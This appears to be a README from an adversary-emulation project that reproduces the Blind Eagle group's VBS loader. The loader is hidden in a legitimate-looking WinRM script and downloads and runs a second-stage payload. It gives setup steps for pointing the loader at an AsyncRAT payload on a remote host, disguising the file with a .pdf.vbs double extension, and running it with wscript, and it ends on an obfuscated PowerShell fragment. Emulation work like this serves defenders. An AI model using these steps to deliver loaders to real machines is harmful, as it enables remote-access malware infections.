Blind Eagle is known to use VBS loaders as a second-stage or later loader in its malware infection chains [1,2,3,4,5]. The loader for this scenario is based on a variant used in more recent campaigns. The VBS loader is hidden inside a seemingly legitimate WinRM VBS script. The purpose of this loader is to download and execute the second-stage DLL; the loader itself is typically also the file the second-stage DLL loader targets for persistence.
The loader should be populated with the correct URL for the final payload on line 344. The `file-ops.py` script has a function to encode the URL properly.
Typically the VBS file is named according to the current campaign's pretext and uses a double extension such as `.pdf.vbs` [2]. In some instances the payload is also compressed into a `.uue` file or another type of zip/compressed archive [1,2]. Simply double-clicking the file sets off execution.
To execute via CLI:

```
wscript.exe .\eagle_loader.vbs
```
The VBS loader can have issues running the PowerShell script because of the Unicode characters it contains. Saving the VBS loader with UTF-16LE encoding allows PowerShell to run and parse the Unicode URL on line 344 properly.
To save the file as UTF-16LE you can use Visual Studio Code: the current encoding is listed in the lower right corner of the window.

If VSCode shows a different value, click the encoding and choose "Save with Encoding" from the action menu.
- Run `file-ops.py` with the `-u` flag to generate a URL pointing to `asy.txt` (the AsyncRAT payload) on your remote host. This saves a file called `url.txt` in the current folder:

```
py.exe .\file-ops.py -u http://<url>/<to>/asy.txt
```
- Open `url.txt` in VSCode and copy the string into line 344, between the single quotes just after `UUkXaLU = "e').G44☝░@4�tM44☝░@4�thod('VAI').Invok44☝░@4�($null, [obj44☝░@4�ct[]] ('`